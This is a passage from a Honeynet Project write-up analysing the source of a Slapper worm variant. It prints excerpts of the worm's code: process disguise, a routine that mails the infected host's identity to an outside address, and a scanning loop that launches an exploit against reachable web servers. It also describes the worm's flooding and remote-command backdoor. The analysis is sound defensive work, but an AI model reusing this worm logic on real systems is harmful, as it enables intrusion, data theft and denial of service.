<?xml version="1.0"?>
<!DOCTYPE article PUBLIC  "-//OASIS//DTD DocBook XML V4.1.2//EN"
    "http://docbook.org/xml/4.1.2/docbookx.dtd">

  <article>
  <articleinfo>
    <title>Honeynet Project Scan of the Month - Scan 25 (November 2002)</title>

    <author>
      <firstname>Eloy</firstname>
      <surname>Paris</surname>
      <affiliation>
	<address>
	  <email>peloy at chapus dot net</email>
	</address>
      </affiliation>
    </author>

    <abstract>
      <para>
	The Honeynet Project's
	<ulink url="http://www.honeynet.org/scans/scan25/">
	  Scan of the Month for November 2002</ulink> requires the
	analysis of a file obtained from a compromised honeypot. The
	file turns out to be a gzip-compressed GNU tar archive that
	contains two C source files. I found out that these files
	contain the source code for a variant of the Slapper worm that
	hit the Internet on September 13, 2002 and that exploited the
	OpenSSL SSLv2 malformed client key remote buffer overflow
	vulnerability. In this paper I examine how the worm operates,
	what its capabilities are, and how it propagates and infects
	other machines.
      </para>
    </abstract>

    <keywordset>
      <keyword>honeynet</keyword>
      <keyword>honeypot</keyword>
      <keyword>worm</keyword>
      <keyword>eloy paris</keyword>
      <keyword>linux</keyword>
      <keyword>slapper</keyword>
      <keyword>chapu</keyword>
      <keyword>apache</keyword>
      <keyword>openssl</keyword>
      <keyword>vulnerabilities</keyword>
      <keyword>script kiddie</keyword>
    </keywordset>
    
  </articleinfo>

  <!--  start  -->

  <sect1>
    <title>Introduction</title>

    <para>
      This is a submission to the <ulink
      url="http://www.honeynet.org">Honeynet Project</ulink> <ulink
      url="http://www.honeynet.org/scans/scan25/">November 2002 Scan
      of the Month</ulink>. Here I analyze a variant of the Slapper
      worm that hit the Net on September 13, 2002 and that exploited
      the OpenSSL SSLv2 malformed client key remote buffer overflow
      vulnerability.
    </para>

    <para>
      The analysis is in some parts very detailed. If you are a
      grader, have lots of submissions to read, and can't go over all
      the details, or are just a casual reader, feel free to go
      directly to <xref linkend="questions"/>, which contains the
      answers to all the questions of this challenge. The questions
      (and answers) provide a good summary of the most important
      aspects of the worm. However, reading only the answers is not
      the best way to understand the details or the process I
      followed to analyze the worm, so I encourage you to read
      the whole submission.
    </para>

  </sect1>

  <sect1 id="inspection">
    <title>Initial Inspection</title>

    <para>
      The first thing I need to do after downloading the only file
      (called <filename>.unlock</filename>) that the Honeynet Project has
      given us is to determine what type of file I am dealing
      with. The easiest way to do this is by running the Unix
      <command>file</command> command on it:
    </para>

    <para>
      <screen>
peloy@canaima:~$ file .unlock
.unlock: gzip compressed data, from Unix</screen>
    </para>

    <para>
      This tells me that the file was compressed with gzip, which
      uses Lempel-Ziv coding (LZ77). Now I can re-run the
      <command>file</command> command, this time specifying the
      <option>-z</option> switch to look inside the compressed file:
    </para>

    <para>
      <screen>
peloy@canaima:~$ file -z .unlock
.unlock: GNU tar archive (gzip compressed data, from Unix)</screen>
    </para>

    <para>
      The <command>file</command> command is telling me that the
      compressed file contains a GNU tar archive.
    </para>
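    <para>
      The <command>file</command> command makes this kind of
      identification by looking for known magic numbers. In the case
      of gzip, the data starts with the two bytes 0x1f 0x8b (see RFC
      1952). The following is only a minimal sketch of that check;
      the helper name <function>looks_like_gzip()</function> is my
      own and is not part of <command>file</command> or of the worm:
    </para>

    <programlisting><![CDATA[
```c
#include <stddef.h>

/* Hypothetical helper: returns 1 if the buffer starts with the gzip
 * magic bytes 0x1f 0x8b (RFC 1952), 0 otherwise. */
int looks_like_gzip(const unsigned char *buf, size_t len)
{
    if (buf == NULL || len < 2)
        return 0;
    return buf[0] == 0x1f && buf[1] == 0x8b;
}
```
]]></programlisting>

    <para>
      Reading the first two bytes of <filename>.unlock</filename>
      into a buffer and passing them to this helper would be enough
      to confirm the compression format without any external tool.
    </para>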

    <para>
      Finally, to find out the date on which the
      <filename>.unlock</filename> file was generated (information
      we will need to answer one of the Scan of the Month questions)
      I can use the
      <command>ls</command> command. As we can see below, the
      <filename>.unlock</filename> file was last modified
      on September 22, 2002 at 1:06 PM (we don't know the time zone).
      Traditional Unix file systems do not record a creation time, so
      the modification time reported by <command>ls</command> is the
      closest we can get.
    </para>

    <para>
      <screen>
peloy@canaima:~$ ls -l .unlock
-rw-r--r--    1 peloy    peloy       17973 2002-09-22 13:06 .unlock</screen>
    </para>

    <para>
      With this new information
      we can now decompress (<command>gzip</command>'s <option>-d</option>
      switch) the file to standard output (<command>gzip</command>'s
      <option>-c</option> switch) and pipe the output
      to the <command>tar</command> command. We use the <command>tar</command>
      command's <option>-t</option> switch to list the contents of the archive:
    </para>

    <para>
      <screen>
peloy@canaima:~$ gzip -dc .unlock | tar tvf -
-rw-r--r-- root/wheel    70981 2002-09-20 09:28:11 .unlock.c
-rw-r--r-- root/wheel     2792 2002-09-19 17:57:48 .update.c</screen>
    </para>

    <para>
      Bingo! Now we know that we are probably dealing with two C source files, one
      called <filename>.unlock.c</filename> and the other one called
      <filename>.update.c</filename>. We can even see the dates these two
      files were last modified. To extract the contents of the archive we
      just need to run the <command>tar</command> command with the
      <option>-x</option> switch.
    </para>

  </sect1>

  <sect1 id="analysis">
    <title>Analysis</title>

    <para>
      Analysis of this month's Scan of the Month is a lot easier than
      analysis of previous Scans of the Month and Honeynet Project
      challenges like <ulink
	url="http://www.honeynet.org/challenges/scan22/">Scan 22</ulink>
      and the <ulink url="http://www.honeynet.org/reverse/">Reverse
	Challenge</ulink>. This month's Scan of the Month is easy to
      analyze because we are given the <emphasis>actual
	source code</emphasis> of the program we are concerned with. In
      the two other challenges I mentioned above, it was pretty hard to
      do the analysis because we were only given the binaries
      (executable files), so we needed to reconstruct symbol tables and
      decompile the programs. This took a considerable amount of time
      given that the process is highly manual and there are no good
      tools for reverse-engineering Unix binaries (save Dion Mendel's
      tools, which I used for Scan 22).
    </para>

    <para>
      To analyze what the worm does, how it propagates to other
      machines, how it operates, what capabilities it offers, and
      other details, I will go over the worm's source code. I will
      present a source code segment with callouts, followed by
      comments that explain different features of the code segment.
      The number right before each comment is a hyperlink, and
      clicking on it will take you to the specific line the comment
      refers to.
    </para>

    <para>
      Just to provide a general idea, or 20,000-foot view, the program
      structure is something like:
    </para>

    <programlisting>
main()
{
  initialize();

  while (1) {
     select(timeout=2secs);
     every_60secs_task;
     every_3secs_task;
     every_10mins_task;
     scan_and_infect();
     peer_to_peer_network_housekeeping;
     switch (command) {
        case command 1:
          handle_command1;
          break;
        case command 2:
          handle_command2;
          break;
        case udp DoS:
          do_udp_flood;
          break;
        case tcp DoS:
          do_tcp_flood;
          break;
        case dns DoS:
          do_dns_flood;
          break;
        .
        .
        .
        etc.
     }
  }
}</programlisting>

    <para>
      I'll go over each one of these parts in the next sections.
    </para>

    <sect2 id="init">
      <title>Initialization</title>

      <programlisting>
1768 int main(int argc, char **argv) {
1769         unsigned char a=0,b=0,c=0,d=0;
1770         unsigned long bases,*cpbases;
1771         struct initsrv_rec initrec;
1772         int null=open("/dev/null",O_RDWR);
1773         uptime=time(NULL);
1774         if (argc &lt;= 1) { <co id="l1774"/>
1775                 printf("%s: Exec format error. Binary file not executable.\n",argv[0]);
1776                 return 0;
1777         }
1778         srand(time(NULL)^getpid());
1779         memset((char*)&amp;routes,0,sizeof(struct route_table)*24);
1780         memset(clients,0,sizeof(struct ainst)*CLIENTS*2);
1781         if (audp_listen(&amp;udpserver,PORT) != 0) { <co id="l1781"/>
1782                 printf("Error: %s\n",aerror(&amp;udpserver));
1783                 return 0;</programlisting>
      <calloutlist>
	<callout arearefs="l1774">
	  <para>
	    The first thing the worm does is to check the number of
	    arguments passed to it on the command line. The worm expects
	    at least one argument, so if it is called without arguments
	    it prints a nonsensical error message and exits (line 1776).
	  </para>
	</callout>
	<callout arearefs="l1781">
	  <para>
	    The function <function>audp_listen()</function> is called
	    to create a socket and bind it to UDP port 4156 (the
	    parameter PORT is a symbol defined
	    in line 66 as "4156"). The socket, the port number, and
	    other socket-related information are stored in the global
	    variable <varname>udpserver</varname>, which is declared
	    as <type>struct ainst</type>.
	  </para>
	</callout>
      </calloutlist>
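
      <para>
	For readers not familiar with the sockets API, creating a
	socket and binding it to a UDP port takes only a handful of
	calls. The sketch below is my own illustration and not the
	worm's <function>audp_listen()</function>; the name
	<function>udp_listen()</function> and its return convention
	are assumptions made for the example:
      </para>

      <programlisting><![CDATA[
```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical helper: create a UDP socket bound to the given port on
 * all local addresses. Returns the socket descriptor, or -1 on error. */
int udp_listen(unsigned short port)
{
    struct sockaddr_in addr;
    int sock = socket(AF_INET, SOCK_DGRAM, 0);

    if (sock < 0)
        return -1;

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(port);

    if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        close(sock);    /* the port may already be in use */
        return -1;
    }
    return sock;
}
```
]]></programlisting>

      <para>
	Calling <function>udp_listen(4156)</function> would reserve the
	same port the worm uses. A failure here is a useful hint for an
	administrator: if the bind fails on a machine that should not be
	using that port, something else may already be listening on it.
      </para>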
      
      <para>
	In the lines following the call to the
	<function>audp_listen()</function> function (lines 1785 to
	1798) several structures used by the worm are initialized. One
	interesting structure that is initialized here is the array of
	IP addresses <varname>cpbases</varname>, which is initialized
	with the list of IP addresses that is passed to the worm on
	the command line:
      </para>

      <programlisting>
1789         cpbases=(unsigned long*)malloc(sizeof(unsigned long)*argc); <co id="l1789"/>
1790         if (cpbases == NULL) {
1791                 printf("Insufficient memory\n");
1792                 return 0;
1793         }
1794         for (bases=1;bases&lt;argc;bases++) {
1795                 cpbases[bases-1]=aresolve(argv[bases]); <co id="l1795"/>
1796                 relay(cpbases[bases-1],(char*)&amp;initrec,sizeof(struct initsrv_rec)); <co id="l1796"/>
1797         }</programlisting>
      <calloutlist>
	<callout arearefs="l1789">
	  <para>
	    The worm requests memory to store <varname>argc</varname>
	    IP addresses. If memory is not available the worm exits,
	    printing the error message in line 1791.
	  </para>
	</callout>
	<callout arearefs="l1795">
	  <para>
	    This is where the <varname>cpbases</varname> array is
	    initialized. The function <function>aresolve()</function>
	    just resolves a host name and returns the corresponding IP
	    address.
	  </para>
	</callout>
	<callout arearefs="l1796">
	  <para>
	    The function <function>relay()</function> is called. It
	    is in this function that the worm generates its first
	    network activity: the worm sends to each IP address or host
	    name passed on the command line a packet that contains the
	    following data: {tag=0x70, len=0, id=0}. As we shall
	    see, this packet just announces the worm to other peers
	    in the network.
	    <function>relay()</function> calls
	    <function>lowsend()</function>, which in turn does the
	    actual send.
	  </para>
	</callout>
      </calloutlist>

	
      <programlisting>
1799         dup2(null,0); dup2(null,1); dup2(null,2); <co id="l1799"/>
1800         if (fork()) return 1;</programlisting>
      <calloutlist>
	<callout arearefs="l1799">
	  <para>Here the worm goes daemon. For this it duplicates the
	    file descriptor <varname>null</varname>, which is
	    associated with <filename>/dev/null</filename>, as file
	    descriptors 0, 1, and 2, which correspond to
	    standard input, standard output and standard error respectively.
	  </para>
	  <para>
	    Finally, in the next line (line 1800) the worm forks. If the fork is
	    successful the child continues to run and the parent exits with
	    a return code of 1. If the fork is not successful the worm
	    exits with a return code of 1 as well.
	  </para>
	</callout>
      </calloutlist>
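
      <para>
	The two steps above (pointing the standard streams at
	<filename>/dev/null</filename> and continuing in a child
	process) can be sketched as follows. This is an illustration
	under my own assumptions, not the worm's code: the function
	names are hypothetical, and unlike the worm the sketch checks
	for errors and reports a failed <function>fork()</function>
	separately.
      </para>

      <programlisting><![CDATA[
```c
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: make descriptor fd refer to /dev/null.
 * Returns 0 on success, -1 on error. */
int redirect_to_devnull(int fd)
{
    int null = open("/dev/null", O_RDWR);

    if (null < 0)
        return -1;
    if (dup2(null, fd) < 0) {
        close(null);
        return -1;
    }
    if (null != fd)
        close(null);    /* keep only the duplicate */
    return 0;
}

/* Redirect stdin, stdout and stderr, then continue in a child process.
 * Returns 0 in the child and -1 on error; the parent exits. */
int go_background(void)
{
    pid_t pid;
    int fd;

    for (fd = 0; fd <= 2; fd++)
        if (redirect_to_devnull(fd) < 0)
            return -1;

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid > 0)
        _exit(0);       /* parent */
    return 0;           /* child */
}
```
]]></programlisting>

      <para>
	A conventional daemon would usually also call
	<function>setsid()</function> to detach from the controlling
	terminal; the lines shown above do not do that.
      </para>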


      <programlisting>
1801 // aion
1802              mailme(argv[1]); zhdr(0); <co id="l1802"/>
1803         for(a=0;argv[0][a]!=0;a++) argv[0][a]=0; <co id="l1803"/>
1804         for(a=0;argv[1][a]!=0;a++) argv[1][a]=0; <co id="l1804"/>
1805         strcpy(argv[0],PSNAME); <co id="l1805"/>
1806
1807         a=classes[rand()%sizeof(classes)]; b=rand(); c=0; d=0; <co id="l1807"/>
1808         signal(SIGCHLD, nas); signal(SIGHUP, nas); <co id="l1808"/></programlisting>

      <calloutlist>
	<callout arearefs="l1802">
	  <para>
	    In line 1802 the worm calls the function
	    <function>mailme()</function>, which does the following:
	  </para>
	  
	  <orderedlist>
	    <listitem>
	      <para>Creates a temporary socket.</para>
	    </listitem>
	    <listitem>
	      <para>Uses this socket to establish a TCP connection with port
		25 (Simple Mail Transfer Protocol) of the host
		freemail.ukr.net</para>
	    </listitem>
	    <listitem>
	      <para>Uses this TCP connection to send mail to
		<email>aion@ukr.net</email>. The host name used in the
		HELO SMTP command is test, and the sender used in the
		MAIL FROM SMTP command is test@microsoft.com. The e-mail
		does not have any headers and the body contains the following
		three lines:</para>

	      <literallayout>
hostid:   (decimal number)
hostname: (string)
att_from: (string)
	      </literallayout>

	      <para>hostid and hostname are obtained via the
		<function>gethostid()</function> and
		<function>gethostname()</function> C library functions,
		and they refer to the host executing the worm. att_from
		is the only parameter passed to the
		<function>mailme()</function> function, and represents the first
		argument passed to the worm on the command line.
		This argument is an IP address.</para>
	    </listitem>
	    <listitem>
	      <para>After the e-mail is sent, the function destroys the
		socket, which closes the TCP connection.</para>
	    </listitem>
	  </orderedlist>

	</callout>
	<callout arearefs="l1803">
	  <para>
	    Line 1803 just wipes out the string pointed to by argv[0], which
	    is the program name. The name is wiped out by writing zeroes
	    to each byte in the string.</para>
	</callout>
	<callout arearefs="l1804">
	  <para>
	    Line 1804 also wipes a string, but in this case the one pointed
	    to by argv[1], which is the first parameter passed to the worm
	    when it was invoked.</para>
	</callout>
	<callout arearefs="l1805">
	  <para>
	    In line 1805 the worm tries to disguise the program name
	    by overwriting argv[0] with the string "httpd ". This way
	    an administrator running the <command>ps</command> command
	    would think that an HTTP server process is running.</para>
	</callout>
	<callout arearefs="l1807">
	  <para>
	    As we will see later, the worm scans other networks to try
	    to find other vulnerable hosts to which it can spread. In
	    line 1807 the worm initializes the first 16 bits (the first
	    two octets) of the IP networks it will scan. It does this by
	    choosing a random entry from the classes[] array for the
	    first octet, and by choosing a completely random value for
	    the second octet.
	  </para>
	</callout>
	<callout arearefs="l1808">
	  <para>
	    Finally, in line 1808 the worm assigns the signal handler
	    <function>nas()</function> to signals SIGCHLD and SIGHUP.
	    <function>nas()</function> does not do anything so in fact
	    these two signals are ignored if they are received.
	  </para>
	</callout>
      </calloutlist>
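
      <para>
	The wipe-and-rename trick in lines 1803 to 1805 can be
	illustrated on an ordinary string buffer. The sketch below is
	my own and the name <function>mask_argument()</function> is
	hypothetical. Note one difference: the worm uses an unbounded
	<function>strcpy()</function>, which writes past the end of the
	original string when the original program name is shorter than
	"httpd ", while the sketch never writes more bytes than the
	original string occupied.
      </para>

      <programlisting><![CDATA[
```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: overwrite the NUL-terminated string at arg with
 * zero bytes, then copy as much of name as fits in the space the
 * original string occupied. Returns the number of bytes copied. */
size_t mask_argument(char *arg, const char *name)
{
    size_t room = strlen(arg);
    size_t n = strlen(name);

    memset(arg, 0, room);   /* wipe, as in lines 1803 and 1804 */
    if (n > room)
        n = room;           /* stay inside the original string */
    memcpy(arg, name, n);
    return n;
}
```
]]></programlisting>

      <para>
	Because <command>ps</command> reads the argument strings of a
	process, changing them in place is enough to change what an
	administrator sees in the process list.
      </para>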

      <para>Here ends the initialization section of the worm's
	code. In the next section I will go in detail over the main
	loop of the worm.</para>
      
    </sect2>

    <sect2><title>Main Loop</title>

      <para>
	The main loop begins in line 1809. It is a big "while" loop
	that never exits. The first thing the worm does inside the
	main loop is to set a file descriptor set (stored in the
	variable <varname>read</varname>, declared as
	<type>fd_set</type> inside the main loop) so several sockets
	can be monitored with the <function>select()</function>
	function call:
      </para>

      <programlisting>
1818                 FD_ZERO(&amp;read);
1819                 if (udpserver.sock > 0) FD_SET(udpserver.sock,&amp;read); <co id="l1819"/>
1820                 udpserver.len=0; <co id="l1820"/>
1821                 l=udpserver.sock; 
1822                 for (n=0;n&lt;(CLIENTS*2);n++) if (clients[n].sock > 0) { <co id="l1822"/>
1823                         FD_SET(clients[n].sock,&amp;read);
1824                         clients[n].len=0;
1825                         if (clients[n].sock > l) l=clients[n].sock;
1826                 }
1827                 memset((void*)&amp;tm,0,sizeof(struct timeval));
1828                 tm.tv_sec=2; <co id="l1828"/>
1829                 tm.tv_usec=0;
1830                 l=select(l+1,&amp;read,NULL,NULL,&amp;tm);</programlisting>
      <calloutlist>
	<callout arearefs="l1819">
	  <para>The main socket is added to the file descriptor set.
	  </para>
	</callout>
	<callout arearefs="l1820">
	  <para>
	    The number of bytes read is initialized to zero.
	  </para>
	</callout>
	<callout arearefs="l1822">
	  <para>
	    Same thing for the file descriptors associated with
	    other peers in the network: we add each peer's socket to
	    the set of file descriptors to watch and set the number
	    of bytes read to zero.
	  </para>
	</callout>
	<callout arearefs="l1828">
	  <para>
	    The worm wants to wait two seconds for a change in any of the
	    file descriptors <function>select()</function> is
	    watching. Here this timeout is configured.</para>
	</callout>
      </calloutlist>
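
      <para>
	The same pattern (build a descriptor set, track the highest
	descriptor, set a timeout, call
	<function>select()</function>) can be written as a small
	stand-alone function. This is a sketch under my own
	assumptions: the name <function>wait_readable()</function> is
	hypothetical, and it marks unused slots with a negative value,
	whereas the worm treats a socket value of zero as unused.
      </para>

      <programlisting><![CDATA[
```c
#include <sys/select.h>
#include <sys/time.h>
#include <unistd.h>

/* Hypothetical helper: wait up to timeout_sec seconds for any of the n
 * descriptors in fds to become readable. Returns the number of ready
 * descriptors, 0 on timeout, or -1 on error. */
int wait_readable(const int *fds, int n, int timeout_sec)
{
    fd_set readset;
    struct timeval tv;
    int i, maxfd = -1;

    FD_ZERO(&readset);
    for (i = 0; i < n; i++) {
        if (fds[i] < 0)
            continue;               /* unused slot */
        FD_SET(fds[i], &readset);
        if (fds[i] > maxfd)
            maxfd = fds[i];
    }

    tv.tv_sec = timeout_sec;
    tv.tv_usec = 0;

    /* select() expects the highest descriptor plus one. */
    return select(maxfd + 1, &readset, NULL, NULL, &tv);
}
```
]]></programlisting>

      <para>
	With a two-second timeout, as in line 1828, the caller regains
	control at least every two seconds even when no packet arrives,
	which is what lets the main loop run its periodic tasks.
      </para>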

      <para>After <function>select()</function> is called in line
	1830, the worm will execute three pieces of code depending on
	whether specific time intervals have elapsed. The first piece
	of code is executed every 60 seconds, the second
	every 3 seconds, and the third every 10 minutes.
      </para>

      <para>The code that is executed every 60 seconds is the following:</para>

      <programlisting>
1849     timeout+=time(NULL)-start;
1850     if (timeout >= 60) {
1851       if (links == NULL || numlinks == 0) {
1852         memset((void*)&amp;initrec,0,sizeof(struct initsrv_rec));
1853         initrec.h.tag=0x70;
1854         initrec.h.len=0;
1855         initrec.h.id=0;
1856         for (i=0;i&lt;bases;i++) relay(cpbases[i],(char*)&amp;initrec,
                 sizeof(struct initsrv_rec)); <co id="l1856"/>
1857       }
1858       else if (!myip) {
1859         memset((void*)&amp;initrec,0,sizeof(struct initsrv_rec));
1860         initrec.h.tag=0x74;
1861         initrec.h.len=0;
1862         initrec.h.id=0;
1863         segment(2,(char*)&amp;initrec,sizeof(struct initsrv_rec)); <co id="l1863"/>
1864       }
1865       timeout=0;
1866     }</programlisting>
      <calloutlist>
	<callout arearefs="l1856">
	  <para>If the worm does not know of other peers in the
	    network (that is, if the variable <varname>links</varname>
	    is NULL or if the variable <varname>numlinks</varname> is
	    0) the worm will do the same thing it did in line 1796
	    (see <xref linkend="init"/> above), which is to send a
	    packet with the data {tag=0x70, len=0, id=0} to each of
	    the IP addresses passed on the command line.
	  </para>

	  <para>
	    Note that there is an off-by-one bug in this loop: the
	    array <varname>cpbases[]</varname> was allocated with
	    <varname>argc</varname> elements, but only the first
	    <varname>argc - 1</varname> were filled in (one per
	    command-line argument). The loop runs from 0 to
	    <varname>bases - 1</varname>, and <varname>bases</varname>
	    equals <varname>argc</varname> once the initialization
	    loop in line 1794 has finished, so the loop also uses the
	    last element, which was never initialized. The result is
	    that there is one extra UDP packet that is sent; when that
	    element happens to contain zero the packet goes to 0.0.0.0
	    and ends up going to the local machine.
	  </para>
	</callout>
	<callout arearefs="l1863">
	  <para>
	    If the worm does know of other peers in the network but
	    does not yet know its own IP address (variable
	    <varname>myip</varname> is zero), the worm sends a packet
	    with the data {tag=0x74, len=0, id=0} by calling the
	    <function>segment()</function> function.
	  </para>
	</callout>
      </calloutlist>
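
      <para>
	The 60-second check in lines 1849 to 1866 follows a simple
	pattern: add the time spent in the last loop iteration to a
	counter, compare the counter with the interval, and reset it
	when the task runs. A minimal sketch of that pattern follows.
	The structure and function names are hypothetical, and I am
	assuming that the other periodic tasks use the same
	bookkeeping.
      </para>

      <programlisting><![CDATA[
```c
/* Hypothetical bookkeeping for one periodic task. */
struct periodic {
    long interval;  /* seconds between runs */
    long elapsed;   /* seconds accumulated since the last run */
};

/* Add the seconds spent in the last loop iteration and report whether
 * the task is due. Resets the accumulator when the task fires. */
int periodic_due(struct periodic *p, long seconds_passed)
{
    p->elapsed += seconds_passed;
    if (p->elapsed >= p->interval) {
        p->elapsed = 0;
        return 1;
    }
    return 0;
}
```
]]></programlisting>

      <para>
	Since <function>select()</function> returns at least every two
	seconds, each task fires within about two seconds of its
	nominal interval.
      </para>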

      <para>The code that is executed every 3 seconds (lines 1869 to
      1893) handles the sending of messages in the message queue. The
      worm maintains a queue of messages to send to
      other peers it knows about. In some cases the worm sends
      the messages immediately, but in others messages are queued
      for later transmission.</para>

      <para>The code that is executed every 10 minutes (lines 1896 to
      1900) just sends information about the peer-to-peer network of
      infected machines from the point of view of the sending machine
      to a random peer. The work is done by the function
      <function>broadcast()</function>.</para>

      <para>In lines 1903 and 1905, the worm checks whether any of the
      sockets <function>select()</function> is watching has data,
      i.e. whether data has been received. If there is data, these two
      lines set the <varname>len</varname> field of the structures the
      worm uses to keep track of connection state to
      <varname>AREAD</varname>.</para>

      <para>Next, in line 1907, and extending to line 1938, the worm
      searches for remote machines it can infect. I go into the
      details of how the worm does this in <xref
      linkend="propagation"/>.</para>

      <para>After worm propagation has been taken care of, the worm
      seems to do some housekeeping tasks related to the peer-to-peer
      network. There can be up to 128 peers the worm is in touch with,
      and from line 1939 to line 2006, the worm performs tasks like
      adding and deleting peers to and from the internal list that
      keeps track of all connections. This list is stored in the array
      <varname>clients</varname>. I must confess that due to lack of
      time I did not go into the details of how the peer-to-peer
      network capabilities of the worm work.</para>

      <para>Finally, in line 2008 the last logical section of the main
      loop is started. This last section reads any command received
      on UDP port 4156 and processes it. One of the features of the
      worm is that it provides backdoor capabilities that support a
      variety of tasks. For example, anyone who knows that the worm is
      executing on a specific machine can request the worm to
      launch UDP, TCP or DNS Denial of Service attacks against any
      specific host, to run a command on the
      infected machine, to scan all files on the infected
      machine and send back a list of all e-mail addresses found,
      etc.</para>

      <para><xref linkend="commands"/> contains a list of the commands
      the worm understands.</para>

    </sect2>

    <sect2 id="propagation">
      <title>Worm Propagation</title>

      <para>
	There are three aspects to the propagation of the worm to
	other machines: 1) search of remote machines to exploit
	(scanning of remote machines), 2) exploitation of a known
	vulnerability to get access to the remote host, and 3)
	replication of the worm to successfully compromised remote
	machines. I will go over each one of these aspects in the
	following sections.
      </para>

      <sect3>
	<title>The Quest for Vulnerable Hosts</title>

	<para>
	  As we shall see, the way the worm scans for other vulnerable
	  hosts is simple. The code that scans remote hosts the worm
	  can exploit begins in line 1907 and extends until line 1938.
	  Here's what the scanning code does:
	</para>

	<programlisting>
1907 #ifdef SCAN <co id="l1907"/>
1908     if (myip) for (n=CLIENTS,p=0;n&lt;(CLIENTS*2) &amp;&amp; p&lt;100;n++)
                if (clients[n].sock == 0) { <co id="l1908"/>
1909       char srv[256];
1910       if (d == 255) { <co id="l1910"/>
1911         if (c == 255) {
1912           a=classes[rand()%(sizeof classes)];
1913           b=rand();
1914           c=0;
1915         }
1916         else c++;
1917         d=0;
1918       }
1919       else d++;
1920       memset(srv,0,256);
1921       sprintf(srv,"%d.%d.%d.%d",a,b,c,d);
1922       clients[n].ext=time(NULL);
1923       atcp_sync_connect(&amp;clients[n],srv,SCANPORT);
1924       p++;
1925     }
1926     for (n=CLIENTS;n&lt;(CLIENTS*2);n++) if (clients[n].sock != 0) { <co id="l1926"/>
1927       p=atcp_sync_check(&amp;clients[n]);
1928       if (p == ASUCCESS || p == ACONNECT || time(NULL)-((unsigned long)clients[n].ext) >= 5)
                atcp_close(&amp;clients[n]); <co id="l1928"/>
1929       if (p == ASUCCESS) { <co id="l1929"/>
1930         char srv[256];
1931         conv(srv,256,clients[n].in.sin_addr.s_addr);
1932         if (mfork() == 0) {
1933           exploit(srv);
1934           exit(0);
1935         }
1936       }
1937     }
1938 #endif</programlisting>
	<calloutlist>
	  <callout arearefs="l1907">
	    <para>
	      All the scanning code is enclosed by a "#ifdef SCAN"
	      construct. My guess is that this was put in place by the
	      author of the worm to make debugging and testing
	      easier. The symbol <varname>SCAN</varname> is obviously
	      defined (in line 59.)
	      </para></callout>

	  <callout arearefs="l1908">
	    <para> The worm will scan consecutive IP addresses. The
	      first IP address will have the form
	      <varname>a.b.c.d</varname>, where <varname>a</varname>
	      will be initially randomly set to one value from an
	      array of pre-defined IP networks to scan (see line 291
	      for the actual declaration of the
	      <varname>classes[]</varname> array),
	      <varname>b</varname> will be set to a random value, and
	      <varname>c</varname> and <varname>d</varname> will be
	      set to zero.
	  </para>

	  <para>
	    After initializing <varname>a.b.c.d</varname> as I just
	    described, the worm will create batches of up to 100 TCP
	    sockets and <varname>sockaddr</varname> structures. Each
	    <varname>sockaddr</varname> structure will have the
	    destination IP address set to the current value of
	    <varname>a.b.c.d</varname> and the port number set to 80.
	    The creation of the sockets and the initialization of the
	    <varname>sockaddr</varname> structures is actually done by
	    the <function>atcp_sync_connect()</function> function in
	    line 1923.
	  </para></callout>

	<callout arearefs="l1910"><para>
	    The way the <varname>a.b.c.d</varname> changes is as follows:
	    if both <varname>c</varname> and <varname>d</varname>
	    are equal to 255 it will reinitialize
	    <varname>a.b.c.d</varname> as I described above. If only
	    <varname>d</varname> is 255 then it will increment
	    <varname>c</varname>. If neither <varname>c</varname> nor
	    <varname>d</varname> is 255 then it will just increment
	    <varname>d</varname>.
	  </para></callout>

	<callout arearefs="l1926">
	    <para>
	      Once 100 sockets and <varname>sockaddr</varname>
	      structures have been created and initialized, the worm
	      proceeds to check whether each remote host has port
	      <varname>SCANPORT</varname> open, where
	      <varname>SCANPORT</varname> is a symbol defined in line
	      67 as 80, the Hypertext Transfer Protocol (HTTP)
	      port. The function that is called to determine whether
	      port 80 of the remote host is open is
	      <function>atcp_sync_check()</function>. This function
	      just calls the standard sockets API function
	      <function>connect()</function>. The parameters to the
	      <function>connect()</function> call are extracted from
	      the previously created sockets and sockaddr structures.
	    </para>
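	    <para>
	      Checking a pending connection by calling
	      <function>connect()</function> again only makes sense on
	      a non-blocking socket, so I am assuming that is how the
	      worm's sockets are configured. The sketch below shows the
	      general technique with hypothetical function names; it is
	      not the worm's code, and the exact error codes returned
	      by the second <function>connect()</function> call vary
	      somewhat between operating systems.
	    </para>

	    <programlisting><![CDATA[
```c
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical helper: start a non-blocking TCP connect to an IPv4
 * address given in dotted-quad form. Fills in *addr for later checks
 * and returns the socket, or -1 on error. */
int start_connect(const char *ip, unsigned short port,
                  struct sockaddr_in *addr)
{
    int flags, sock = socket(AF_INET, SOCK_STREAM, 0);

    if (sock < 0)
        return -1;
    memset(addr, 0, sizeof(*addr));
    addr->sin_family = AF_INET;
    addr->sin_port = htons(port);
    if (inet_pton(AF_INET, ip, &addr->sin_addr) != 1 ||
        (flags = fcntl(sock, F_GETFL, 0)) < 0 ||
        fcntl(sock, F_SETFL, flags | O_NONBLOCK) < 0) {
        close(sock);
        return -1;
    }
    /* EINPROGRESS means the handshake continues in the background. */
    if (connect(sock, (struct sockaddr *)addr, sizeof(*addr)) < 0 &&
        errno != EINPROGRESS) {
        close(sock);
        return -1;
    }
    return sock;
}

/* Poll the pending connect by calling connect() again.
 * Returns 1 if connected, 0 if still pending, -1 if it failed. */
int check_connect(int sock, const struct sockaddr_in *addr)
{
    if (connect(sock, (const struct sockaddr *)addr, sizeof(*addr)) == 0 ||
        errno == EISCONN)
        return 1;
    if (errno == EINPROGRESS || errno == EALREADY)
        return 0;
    return -1;
}
```
]]></programlisting>

	    <para>
	      Because neither call blocks, a single process can have
	      many connection attempts outstanding at once, which is
	      what allows the worm to probe hosts in batches.
	    </para>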
	  </callout>

	  <callout arearefs="l1928">
	    <para>
	      If it was possible to establish a TCP connection with
	      port 80 of the remote host, the TCP connection is closed
	      by calling the function
	      <function>atcp_close()</function>. The socket is also
	      closed if the attempt has been pending for 5 seconds or
